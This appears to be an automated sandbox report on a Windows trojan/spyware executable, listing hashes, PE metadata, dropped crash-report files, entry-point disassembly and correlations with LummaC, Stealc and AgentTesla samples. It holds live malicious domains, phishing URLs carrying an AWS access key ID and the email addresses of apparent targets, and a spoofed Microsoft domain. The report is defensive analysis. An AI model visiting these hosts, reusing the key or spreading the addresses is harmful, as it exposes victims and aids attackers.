                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Sample name:mG83m82qhF.exe
                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                              Original Sample Name:b51d856b18ecfad7b127881f7819409b.exe
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@2/5@3/3
                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                              HCA Information:
                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.89.179.12, 13.107.246.63, 4.175.87.197, 40.126.53.19
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                              • Execution Graph export aborted for target mG83m82qhF.exe, PID 7704 because there are no executed function
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                              02:31:24API Interceptor33x Sleep call for process: mG83m82qhF.exe modified
                                                                                                                                                                              02:32:28API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              172.67.150.173RDFchOT4i0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                              063837646WAYBILLMAR24.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                              SecuriteInfo.com.Trojan.DownLoaderNET.943.16578.26938.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                              DHL- Shipping invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                              DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                              Kazeem Engineering and Technical Services.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                                                                                              POs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                                                                                              PO-065-01-2024E-2.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                                                                                                                              New Orders#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                              Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                              185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • jasonj002.bitbucket.io/
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              s3-w.us-east-1.amazonaws.comLP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 16.182.101.249
                                                                                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.18.140
                                                                                                                                                                              5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.203.57
                                                                                                                                                                              TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 3.5.16.86
                                                                                                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 16.182.37.145
                                                                                                                                                                              EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.216.41.233
                                                                                                                                                                              https://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                              • 52.217.128.241
                                                                                                                                                                              https://ho8d1o.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=h4n%2BY6bT0YHF44DbJkmJeHwDnn0%3D&Expires=1734860434#mandy.pullen@peterborough.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                              • 52.216.142.68
                                                                                                                                                                              https://preview.micrasoft-office365.com/f5c275dd184cbe62?l=6Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.231.135.57
                                                                                                                                                                              bitbucket.orgLP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.50
                                                                                                                                                                              5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              cuddlyready.xyzpfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.32.96
                                                                                                                                                                              0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 193.143.1.9
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              CLOUDFLARENETUSpfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.32.96
                                                                                                                                                                              0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.199.72
                                                                                                                                                                              ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 104.21.36.201
                                                                                                                                                                              AMAZON-02USLP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.18.140
                                                                                                                                                                              armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.203.164.5
                                                                                                                                                                              5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.203.57
                                                                                                                                                                              TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              • 108.139.47.92
                                                                                                                                                                              AMAZON-02USLP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.67.100
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.18.140
                                                                                                                                                                              armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.203.164.5
                                                                                                                                                                              5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 52.217.203.57
                                                                                                                                                                              TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 185.166.143.48
                                                                                                                                                                              EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              • 108.139.47.92
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                              • 172.67.150.173
                                                                                                                                                                              • 52.217.136.89
                                                                                                                                                                              • 185.166.143.49
                                                                                                                                                                              No context
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                              Entropy (8bit):1.0430225787012481
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:SeFLMzc3uhschroI7JfpQXIDcQvc6QcEVcw3cE/n+HbHg/8BRTf3Oy1oVazW0EVO:F+Jhk0BU/gjudxQfzuiFEZ24IO8+
                                                                                                                                                                              MD5:BAA001319F4A3E642941D9E1BB28BF53
                                                                                                                                                                              SHA1:59726B305D5A5B35FFA5161DDACE9D7ACD2F091D
                                                                                                                                                                              SHA-256:AAB0936365656838CE04D320331E712EE4DA113EF5C8A0A4BA9663159CEE76E3
                                                                                                                                                                              SHA-512:64DD0D4AD4F54B838D4EC3A4DC4DDDEC9FCF2A7F470A885D9E8841A2E279F3F4F80CEF430DFD495E4F758126A427506F099F3E87D25929303868C33783ABF1CA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.1.2.7.1.2.7.1.2.3.1.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.1.2.7.1.3.4.4.6.6.9.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.6.a.0.6.2.6.-.8.1.e.0.-.4.6.f.5.-.8.a.e.8.-.f.f.1.3.b.7.0.6.5.0.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.f.e.d.9.2.6.-.1.e.0.8.-.4.f.2.5.-.9.c.6.2.-.9.c.3.d.e.3.0.b.4.4.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.G.8.3.m.8.2.q.h.F...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.1.8.-.0.0.0.1.-.0.0.1.3.-.0.1.d.a.-.6.7.a.8.0.c.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.e.f.7.d.0.b.7.4.9.6.8.6.5.6.3.d.5.5.7.f.5.e.f.1.3.7.e.9.1.c.e.0.0.0.0.f.f.f.f.!.0.0.0.0.6.1.3.6.5.a.9.f.4.7.4.e.d.8.9.c.c.6.b.c.c.4.5.b.d.0.8.3.5.5.a.3.8.1.c.a.c.b.8.5.!.m.G.8.3.m.8.2.q.h.F...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 07:31:52 2024, 0x1205a4 type
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):289986
                                                                                                                                                                              Entropy (8bit):1.471476629474298
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:Cem6SBBtHTQ7T3KI37Lz2DGJbObGT2Jgr0Lh49sKUE4X:Cem5ET3Tb9Qbi1ILh49V74X
                                                                                                                                                                              MD5:34F8354A8F01E00B91F24F008C161548
                                                                                                                                                                              SHA1:BEABFC719792E5C81853841EDDA38AE5DF8B9158
                                                                                                                                                                              SHA-256:43B73ABCC8DC61E0EFA59B2335D10387D60773C442A53BB318A4CFD73D013C61
                                                                                                                                                                              SHA-512:4CD02F1DEFB844BE486DB3D13B1B4075B1708BCBEC39BCA8BB549EF978F0EDF619701FF1CFD90E897B6EAA659AAAD2CE49629C1DA7BCA2AB0E1C924FFA44734E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MDMP..a..... .........ig....................................D....'..........L...........`.......8...........T............L... ...........(...........*..............................................................................eJ......`+......GenuineIntel............T.............ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):8382
                                                                                                                                                                              Entropy (8bit):3.7047535707795483
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:R6l7wVeJyBe696YWSSUhZgmfceXgpry89b/60Asf31m:R6lXJ9696YTSUhZgmfceG/60Tfo
                                                                                                                                                                              MD5:E179AF95FE08A4DC6367E43DC44BD91F
                                                                                                                                                                              SHA1:4DB87EC2103EC7F5BA346BF6956CC5D90B90C90A
                                                                                                                                                                              SHA-256:E091C481EA6461738EE815070EA27104C5679452D0A83C3824EC7D2C8428F6A4
                                                                                                                                                                              SHA-512:5D6E423E0D5CAC7CE3196B9C1DF1EC837CDA6D87A36B6A0026CB943710E73F58C2E1122389A62089278618D47857A4292CB4AE8C1E893C45A823996F487892FE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.0.4.<./.P.i.
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4624
                                                                                                                                                                              Entropy (8bit):4.498352846466672
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:cvIwWl8zsnVJg77aI9MPWpW8VYSYm8M4JpKcFvG+q896LsuzS2d:uIjfnvI76e7ViJrGFsuzS2d
                                                                                                                                                                              MD5:51D92F8F419A98ABF4E6139BA6FBBF4E
                                                                                                                                                                              SHA1:7917694D246653D6E31C685F3F51681AF42A7B18
                                                                                                                                                                              SHA-256:7A90A923DBEBEB2A4EAB8ABD6C3EB4F9625B4B534331D6A92158EB6935FDC0AE
                                                                                                                                                                              SHA-512:22086BE38AC8BB39E5FA61B557B9B8B5E82493044104D1193F111F2F3F6F96B9FB5FC3D89FFB95AB41EACE380341FF951C82444626F2B44FDE6AB00D46B2238B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643594" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                              Entropy (8bit):4.295989553156402
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:L41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+z6mBMZJh1Vji:k1/YCW2AoQ0NiV6wMHrVm
                                                                                                                                                                              MD5:16840C8B58F18F28414D87194B557430
                                                                                                                                                                              SHA1:28CC03F0340B02CF054CB065675F2150B46171FB
                                                                                                                                                                              SHA-256:EFF828AB9CAA7C4C1A61D0E3B0A260A0D7D1EF969296D5313B39E804DC46E11C
                                                                                                                                                                              SHA-512:8B1559D7B27D3DB71CD5419B42E36B1D5871C440C20837029D8F634F54EEF8562EC3E13B7C218624D11BAE33F50A2A77E056E036AFBE1A0C3A88AAD068A2810B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.^..U..............................................................................................................................................................................................................................................................................................................................................p.J.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Entropy (8bit):6.5553655953166485
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                              File name:mG83m82qhF.exe
                                                                                                                                                                              File size:2'982'400 bytes
                                                                                                                                                                              MD5:b51d856b18ecfad7b127881f7819409b
                                                                                                                                                                              SHA1:61365a9f474ed89cc6bcc45bd08355a381cacb85
                                                                                                                                                                              SHA256:663a74437e86b0bf7008ac4438821bf6c2adc65abf946b81014649a2fc23d294
                                                                                                                                                                              SHA512:ffb1229f3ccbba3c95636a2be637b5bd71fc0a74dcd2bc4f5d6a64b34d20bfbe11fa6430105c2f4bd1ba4227094b0e866a3d06ec002dda9dc8ddba6eefc67471
                                                                                                                                                                              SSDEEP:49152:NFkZEUNMWcDPeBPuD5JL9XAuo0QsREgddD/ZF1Qj6CIXl66pjUNqn3RAqU:TkEUNVcDPeBPuD5JRRom0FIXk6d53N
                                                                                                                                                                              TLSH:ACD52AE2B50962CFD08E16F89427ED826D5D43BD8B2549C79C2C747A6E7BCC021F6C29
                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................`0...........@...........................0...........@.................................T0..h..
                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                              Entrypoint:0x706000
                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:6
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                              Instruction
                                                                                                                                                                              jmp 00007F0668BCB78Ah
                                                                                                                                                                              punpcklbw mm5, qword ptr [00000000h]
                                                                                                                                                                              add cl, ch
                                                                                                                                                                              add byte ptr [eax], ah
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [ebx], al
                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], dh
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax+eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              and al, byte ptr [eax]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              or byte ptr [eax+00000000h], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add ecx, dword ptr [edx]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              xor byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              aas
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [edx], ah
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
